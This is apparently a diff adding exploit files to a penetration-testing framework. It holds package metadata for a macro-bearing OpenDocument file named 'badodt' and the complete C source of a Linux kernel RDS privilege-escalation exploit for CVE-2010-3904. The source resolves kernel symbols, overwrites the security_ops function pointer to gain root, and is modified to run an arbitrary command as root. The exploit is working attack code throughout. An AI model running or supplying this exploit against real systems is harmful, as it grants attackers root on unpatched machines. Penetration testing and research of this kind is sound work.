+  <rdf:Description rdf:about="">
+    <ns0:hasPart xmlns:ns0="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#" rdf:resource="styles.xml"/>
+  </rdf:Description>
+  <rdf:Description rdf:about="content.xml">
+    <rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/odf#ContentFile"/>
+  </rdf:Description>
+  <rdf:Description rdf:about="">
+    <ns0:hasPart xmlns:ns0="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#" rdf:resource="content.xml"/>
+  </rdf:Description>
+  <rdf:Description rdf:about="">
+    <rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#Document"/>
+  </rdf:Description>
+</rdf:RDF>

data/exploits/badodt/manifest.xml

@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
+ <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text" manifest:version="1.2" manifest:full-path="/"/>
+ <manifest:file-entry manifest:media-type="" manifest:full-path="Configurations2/accelerator/current.xml"/>
+ <manifest:file-entry manifest:media-type="application/vnd.sun.xml.ui.configuration" manifest:full-path="Configurations2/"/>
+ <manifest:file-entry manifest:media-type="image/png" manifest:full-path="Thumbnails/thumbnail.png"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="content.xml"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/script-lb.xml"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/Module1.xml"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/script-lc.xml"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="settings.xml"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="styles.xml"/>
+ <manifest:file-entry manifest:media-type="application/rdf+xml" manifest:full-path="manifest.rdf"/>
+ <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="meta.xml"/>
+</manifest:manifest>

data/exploits/badodt/meta.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<office:document-meta xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:grddl="http://www.w3.org/2003/g/data-view#" office:version="1.2"><office:meta><meta:initial-creator>RD_PENTEST</meta:initial-creator><meta:creation-date>2017-02-06T15:15:47.35</meta:creation-date><dc:date>2017-02-06T15:21:59.64</dc:date><dc:creator>RD_PENTEST</dc:creator><meta:editing-duration>PT4M16S</meta:editing-duration><meta:editing-cycles>2</meta:editing-cycles><meta:creation-date>2018-05-10T20:29:41.398000000</meta:creation-date><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="0" meta:word-count="0" meta:character-count="0" meta:non-whitespace-character-count="0"/><meta:generator>LibreOffice/6.0.3.2$Windows_X86_64 LibreOffice_project/8f48d515416608e3a835360314dac7e47fd0b821</meta:generator></office:meta></office:document-meta>

data/exploits/cve-2010-3904/rds-fail.c

@@ -0,0 +1,288 @@
+// source: http://www.vsecurity.com/resources/advisory/20101019-1/
+
+/* 
+ * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
+ * CVE-2010-3904
+ * by Dan Rosenberg <drosenberg@vsecurity.com>
+ *
+ * Copyright 2010 Virtual Security Research, LLC
+ *
+ * The handling functions for sending and receiving RDS messages
+ * use unchecked __copy_*_user_inatomic functions without any
+ * access checks on user-provided pointers.  As a result, by
+ * passing a kernel address as an iovec base address in recvmsg-style
+ * calls, a local user can overwrite arbitrary kernel memory, which
+ * can easily be used to escalate privileges to root.  Alternatively,
+ * an arbitrary kernel read can be performed via sendmsg calls.
+ *
+ * This exploit is simple - it resolves a few kernel symbols,
+ * sets the security_ops to the default structure, then overwrites
+ * a function pointer (ptrace_traceme) in that structure to point
+ * to the payload.  After triggering the payload, the original
+ * value is restored.  Hard-coding the offset of this function
+ * pointer is a bit inelegant, but I wanted to keep it simple and
+ * architecture-independent (i.e. no inline assembly).
+ *
+ * The vulnerability is yet another example of why you shouldn't
+ * allow loading of random packet families unless you actually
+ * need them.
+ *
+ * Greets to spender, kees, taviso, hawkes, team lollerskaters,
+ * joberheide, bla, sts, and VSR
+ *
+ */
+
+// Modified for Metasploit (see comments marked 'msf note')
+
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/ptrace.h>
+#include <sys/utsname.h>
+
+#define RECVPORT 5555 
+#define SENDPORT 6666
+
+int prep_sock(int port)
+{
+	
+	int s, ret;
+	struct sockaddr_in addr;
+
+	s = socket(PF_RDS, SOCK_SEQPACKET, 0);
+
+	if(s < 0) {
+		printf("[*] Could not open socket.\n");
+		exit(-1);
+	}
+	
+	memset(&addr, 0, sizeof(addr));
+
+	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
+	addr.sin_family = AF_INET;
+	addr.sin_port = htons(port);
+
+	ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
+
+	if(ret < 0) {
+		printf("[*] Could not bind socket.\n");
+		exit(-1);
+	}
+
+	return s;
+
+}
+
+void get_message(unsigned long address, int sock)
+{
+
+	recvfrom(sock, (void *)address, sizeof(void *), 0,
+		 NULL, NULL);
+
+}
+
+void send_message(unsigned long value, int sock)
+{
+	
+	int size, ret;
+	struct sockaddr_in recvaddr;
+	struct msghdr msg;
+	struct iovec iov;
+	unsigned long buf;
+	
+	memset(&recvaddr, 0, sizeof(recvaddr));
+
+	size = sizeof(recvaddr);
+
+	recvaddr.sin_port = htons(RECVPORT);
+	recvaddr.sin_family = AF_INET;
+	recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+
+	memset(&msg, 0, sizeof(msg));
+	
+	msg.msg_name = &recvaddr;
+	msg.msg_namelen = sizeof(recvaddr);
+	msg.msg_iovlen = 1;
+	
+	buf = value;
+
+	iov.iov_len = sizeof(buf);
+	iov.iov_base = &buf;
+
+	msg.msg_iov = &iov;
+
+	ret = sendmsg(sock, &msg, 0);
+	if(ret < 0) {
+		printf("[*] Something went wrong sending.\n");
+		exit(-1);
+	}
+}
+
+void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
+{
+
+	if(!fork()) {
+			sleep(1);
+			send_message(value, sendsock);
+			exit(1);
+	}
+	else {
+		get_message(addr, recvsock);
+		wait(NULL);
+	}
+
+}
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+
+int __attribute__((regparm(3)))
+getroot(void * file, void * vma)
+{
+
+	commit_creds(prepare_kernel_cred(0));
+	return -1;	
+
+}
+
+/* thanks spender... */
+unsigned long get_kernel_sym(char *name)
+{
+	FILE *f;
+	unsigned long addr;
+	char dummy;
+	char sname[512];
+	struct utsname ver;
+	int ret;
+	int rep = 0;
+	int oldstyle = 0;
+
+	f = fopen("/proc/kallsyms", "r");
+	if (f == NULL) {
+		f = fopen("/proc/ksyms", "r");
+		if (f == NULL)
+			goto fallback;
+		oldstyle = 1;
+	}
+
+repeat:
+	ret = 0;
+	while(ret != EOF) {
+		if (!oldstyle)
+			ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		else {
+			ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
+			if (ret == 2) {
+				char *p;
+				if (strstr(sname, "_O/") || strstr(sname, "_S."))
+					continue;
+				p = strrchr(sname, '_');
+				if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
+					p = p - 4;
+					while (p > (char *)sname && *(p - 1) == '_')
+						p--;
+					*p = '\0';
+				}
+			}
+		}
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	if (rep)
+		return 0;
+fallback:
+	/* didn't find the symbol, let's retry with the System.map
+	   dedicated to the pointlessness of Russell Coker's SELinux
+	   test machine (why does he keep upgrading the kernel if
+	   "all necessary security can be provided by SE Linux"?)
+	*/
+	uname(&ver);
+	if (strncmp(ver.release, "2.6", 3))
+		oldstyle = 1;
+	sprintf(sname, "/boot/System.map-%s", ver.release);
+	f = fopen(sname, "r");
+	if (f == NULL)
+		return 0;
+	rep = 1;
+	goto repeat;
+}
+
+int main(int argc, char * argv[])
+{
+	unsigned long sec_ops, def_ops, cap_ptrace, target;
+	int sendsock, recvsock;
+	struct utsname ver;
+
+	printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
+	printf("[*] by Dan Rosenberg\n");
+
+	uname(&ver);
+
+	if(strncmp(ver.release, "2.6.3", 5)) {
+		printf("[*] Your kernel is not vulnerable.\n");
+		return -1;
+	}	
+
+	/* Resolve addresses of relevant symbols */
+	printf("[*] Resolving kernel addresses...\n");
+	sec_ops = get_kernel_sym("security_ops");
+	def_ops = get_kernel_sym("default_security_ops");
+	cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
+	commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
+	prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
+
+	if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
+		printf("[*] Failed to resolve kernel symbols.\n");
+		return -1;
+	}
+
+	/* Calculate target */
+	target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));
+
+	sendsock = prep_sock(SENDPORT);
+	recvsock = prep_sock(RECVPORT);
+
+	/* Reset security ops */
+	printf("[*] Overwriting security ops...\n");
+	write_to_mem(sec_ops, def_ops, sendsock, recvsock);
+
+	/* Overwrite ptrace_traceme security op fptr */
+	printf("[*] Overwriting function pointer...\n");
+	write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);
+
+	/* Trigger the payload */
+	printf("[*] Triggering payload...\n");
+	ptrace(PTRACE_TRACEME, 1, NULL, NULL);
+	
+	/* Restore the ptrace_traceme security op */
+	printf("[*] Restoring function pointer...\n");
+	write_to_mem(target, cap_ptrace, sendsock, recvsock);
+
+	if(getuid()) {
+		printf("[*] Exploit failed to get root.\n");
+		return -1;
+	}
+
+	printf("[*] Got root!\n");
+	// msf note: modified to execute argv[1]
+	//execl("/bin/sh", "sh", NULL);
+	system(argv[1]);
+
+}